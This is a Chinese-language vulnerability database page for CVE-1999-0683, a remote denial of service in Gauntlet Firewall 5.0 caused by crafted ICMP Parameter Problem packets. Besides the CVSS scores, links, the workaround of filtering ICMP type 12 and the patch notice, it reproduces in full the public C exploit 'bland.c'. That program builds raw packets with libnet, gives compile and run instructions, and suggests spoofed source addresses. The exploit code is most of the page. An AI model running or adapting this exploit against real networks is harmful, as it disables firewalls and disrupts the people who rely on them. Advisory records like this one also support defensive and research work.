CVE-1999-0683
CVSS5.0
发布时间 :1999-07-30 00:00:00
修订时间 :2008-09-09 08:35:13
NMCOE    

[原文]Denial of service in Gauntlet Firewall via a malformed ICMP packet.


[CNNVD]Gauntlet Firewall决绝服务漏洞(CNNVD-199907-039)

        Gauntlet Firewall存在漏洞。可以通过错误的ICMP包造成服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0683
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0683
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-039
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/556
(VENDOR_ADVISORY)  BID  556
http://www.osvdb.org/1029
(UNKNOWN)  OSVDB  1029

- 漏洞信息

Gauntlet Firewall决绝服务漏洞
中危 未知
1999-07-30 00:00:00 2005-05-02 00:00:00
远程  
        Gauntlet Firewall存在漏洞。可以通过错误的ICMP包造成服务拒绝。

- 公告与补丁

        

- 漏洞信息 (19441)

Network Associates Gauntlet Firewall 5.0 Denial of Service Attack (EDBID:19441)
hardware remote
1999-07-30 Verified
0 Mike Frantzen
N/A [点击下载]
source: http://www.securityfocus.com/bid/556/info

There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a condition where an ICMP Protocol Problem packet's (ICMP_PARAMPROB) encapsulated IP packet has a random protocol field and certain IP options set. When this specially constructed packet ( [ICMP PARAMPROB][IP with random protocol code and some ip options] ) is sent THROUGH the Gauntlet Firewall (not to the firewall itself), the firewall will hang, looking for the packet in it's transparency tables.

The packet structure looks like this:

Begin Packet
------------------------------------------
[NORMAL IP HEADER]

[ICMP PARAMPROB HEADER]

-- encapsulated ip packet --

[IP HEADER]

(important fields in ip header)

ip_p = 98 (let's specify a protocol that doesn't exist)
ip_hl = 0xf (stuff options)


------------------------------------------
End Packet

An attacker would do the following:

Construct the [ip-icmp-ip] packet using a raw socket (SOCK_RAW) with the fields set accordingly, destination set to any machine behind the firewall.

Send the packet(s).

The number of packets that need to be sent depends on the platform (ie Sol on a Sparc vs BSDI).

The consequence of this vulnerability being exploited is the target Gauntlet 5.0 firewall being remotely locked up. It should be expected that an attacker would send packets with spoofed source addresses in the ip header making it difficult to trace. 

/*
 * Discovered and written by:  <godot@msg.net>          <- Send money to :-)
 *     aka     Mike Frantzen   <frantzen@expert.cc.purdue.edu>  <- Reply to
 *
 * Network Associates:  "Who's watching your network?"
 * MSG.net              "Who's watching the watchers?"
 *
 * This can be found online at http://www.msg.net/firewalls/tis/bland.c
 *
 * Description:
 *  If you know an IP that will be routed through a Gauntlet 5.0 Firewall,
 *  you can remotely lock up the firewall (tested against Solaris 2.6 and
 *  BSDI).  It locks up to the point that one packet will disable STOP-A
 *  (L1-A) on Sparcs and ~3-5 packets will disable Ctrl-Alt-Del on BSDI
 *  (Ctrl-Alt-Del still prompts Y/N but it never reboots).
 *
 *  **You can NOT send this to the Gauntlet's IP.  The packet must be one
 *  **that would go through the forwarding code.
 *
 *  If you are on local ether to the firewall, set it as your default route
 *  or otherwise send the packet to the firewall's MAC. 
 *
 *  The packet is parsed before the packet filtering rules in Gauntlet.  So
 *  the only known work-around is to ACL out ICMP type 12 at your screening
 *  router.
 *  Or you could switch to Gauntlet 5.5 which (in the beta) does not seem to
 *  be vulnerable -- but 5.5 introduces some new 'issues'.
 *
 *
 * Technical Description of the packet:
 *  The packet is an ICMP Paramater Problem packet that encapsulates an IP
 *  packet with IP Options.  There is a random protocol in the encapsulated
 *  IP packet.  The trick is:  the inner packet MUST have IP Options.  Some
 *  options work, some don't.
 *  The firewall apparently is looking for the packet (or an entry in its
 *  transparency table) that matches the encapsulated packet.  It just keeps
 *  looking....  It likely has interrupts masked off on Solaris.
 *
 * 
 * You need libnet to link this against.  It's a pretty spiffy lib.
 *   http://www.infonexus.com/~daemon9/Projects/Libnet
 *   http://www.packetfactory.net/libnet
 * 
 *
 * For da script kiddies:
 *   Compile with 'gcc -o bland bland.c -lnet'
 *   ./bland -d <ip through the firewall>
 *   (Did you remember to install Libnet???)
 *
 *
 * If it doesn't compile on your machine:  I DON'T CARE!!!  This program was
 * a quick and dirty hack.  You try reading a hexdump of a packet off the
 * wire and writing something that can reproduce it.
 * I know it compiles and works from FreeBSD 3.1 
 *
 *
 * Network Associates (TIS) was notified two weeks ago and they are working
 * on a patch.
 *
 *
 * Plugs:
 *  ISIC --  Program I used (and wrote) to find bugs in Gauntlet's IP stack.
 *           http://expert.cc.purdue.edu/~frantzen/isic-0.02.tar.gz
 *  Libnet --  Was able to write the basic exploit in 20 minutes because of
 *           libnet.  See libnet link above.  Thanks go out to Route!
 *
 *
 * Credits:
 *  Mike Frantzen <frantzen@expert.cc.purdue.edu>	Hey, thats me!
 *  Mike Scher <strange@cultural.com>
 *  Kevin Kadow <kadokev@msg.net>	      <-  Gauntlet Random Seed Hole
 *  Lenard Lynch <llynch@tribune.com>
 *  Viki Navratilova <vn@msg.net>
 */

#include <libnet.h>

int main(int argc, char **argv)
{
	u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
	u_long *problem = NULL;
	u_char *packet = NULL;
	int sock, c, len = 0;
	long acx, count = 1;
	struct icmp *icmp;
	struct ip *ip;

	/* It appears that most IP options of length >0 will work
	 * Works with 128, 64, 32, 16...  And the normal ones 137... 
	 * Does not work with 0, 1 */
	u_char data[] = {137};
	int data_len = sizeof(data);

	printf("Written by Mike Frantzen...  <godot@msg.net>\n");
	printf("For test purposes only... yada yada yada...\n");

	src_ip = inet_addr("10.10.10.10");

	while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
	  switch(c) {
		case 'd':	dst_ip = libnet_name_resolve(optarg, 1);
				break;
		case 's':	src_ip = libnet_name_resolve(optarg, 1);
				break;
		case 'D':	ins_dst_ip = name_resolve(optarg, 1);
				break;
		case 'S':	ins_src_ip = name_resolve(optarg, 1);
				break;
		case 'l':	data_len = atoi(optarg);
				break;
		case 'c':	if ( (count = atol(optarg)) < 1)
					count = 1;
				break;
		default:	printf("Don't understand option.\n");
				exit(-1);
	  }
	}

	if ( dst_ip == 0 ) {
	    printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n",
		rindex(argv[0], '/') == NULL ? argv[0]
					: rindex(argv[0], '/') + 1);
	    printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n");
	    printf("\t\t[-l <data length>]\t[-c <# to send>]\n");
	    exit(-1);
	}

	if ( ins_dst_ip == 0 )
		ins_dst_ip = src_ip;
	if ( ins_src_ip == 0 )
		ins_src_ip = dst_ip;

	if ( (packet = malloc(1500)) == NULL ) {
		perror("malloc: ");
		exit(-1);
	}
	if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
        	perror("socket: ");
        	exit(-1);
	}

	/* 8 is the length of the ICMP header with the problem field */
	len = 8 + IP_H + data_len;
	bzero(packet + IP_H, len);

        libnet_build_ip(len,                    /* Size of the payload */
                0xc2,                           /* IP tos */
                30241,                          /* IP ID */
                0,                              /* Frag Offset & Flags */
                64,                             /* TTL */
                IPPROTO_ICMP,                   /* Transport protocol */
                src_ip,                         /* Source IP */
                dst_ip,                         /* Destination IP */
                NULL,                           /* Pointer to payload */
                0,
                packet);                        /* Packet memory */


	/* ICMP Header for Parameter Problem
	 * --------------+---------------+---------------+---------------
	 *| Type (12)	 |    Code (0)	 |	Checksum		 |
	 * --------------+---------------+---------------+---------------
	 *| Pointer	 |		unused				 |
	 * --------------+---------------+---------------+---------------
	 * Internet Header + 64 bits of original datagram data....
	 */

	icmp = (struct icmp *) (packet + IP_H);
	problem = (u_long *) (packet + IP_H + 4);  /* 4 = ICMP header  */
	icmp->icmp_type	= ICMP_PARAMPROB;
	icmp->icmp_code	= 0;		/* Indicates a problem pointer */
	*problem = htonl(0x14000000);	/* Problem is 20 bytes into it */


	/* Need to embed an IP packet within the ICMP */
	ip = (struct ip *) (packet + IP_H + 8);	/* 8 = icmp header	*/
	ip->ip_v	= 0x4;			/* IPV4			*/
	ip->ip_hl	= 0xf;			/* Some IP Options	*/
	ip->ip_tos	= 0xa3;			/* Whatever		*/
	ip->ip_len	= htons(data_len);	/* Length of packet	*/
	ip->ip_id	= 30241;		/* Whatever		*/
	ip->ip_off	= 0;			/* No frag's		*/
	ip->ip_ttl	= 32;			/* Whatever		*/
	ip->ip_p	= 98;			/* Random protocol	*/
	ip->ip_sum	= 0;			/* Will calc later	*/
	ip->ip_src.s_addr = ins_src_ip;
	ip->ip_dst.s_addr = ins_dst_ip;

	/* Move our data block into the packet */
	bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);

	/* I hate checksuming.  Spent a day trying to get it to work in
	 * perl...  That sucked...  Tequilla would have helped immensly.
	 */
	libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);

	/* Bah...  See above comment.... */
	libnet_do_checksum(packet, IPPROTO_ICMP, len);


	printf("Sending %li packets", count);
	for (acx = 0; acx < count; acx++) {
	   if( libnet_write_ip(sock, packet, len + IP_H)  < (len + IP_H))
 		perror("write_ip: ");
	   else printf(".");
	}
	printf("\n\n");
	return( 0 );
}

		

- 漏洞信息

1029
NAI Gauntlet Firewall Malformed ICMP Packet Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Gauntlet Firewall contains a flaw that may allow a remote attacker to crash the firewall. The issue is due to a flaw in the packet filter when it receives a ICMP Parameter Problem packets. If an attacker sends a specially crafted packet with such an option to a machine behind the firewall, Gauntlet will crash.

- 时间线

1999-07-30 Unknow
1999-07-30 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Network Associates/PGP has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站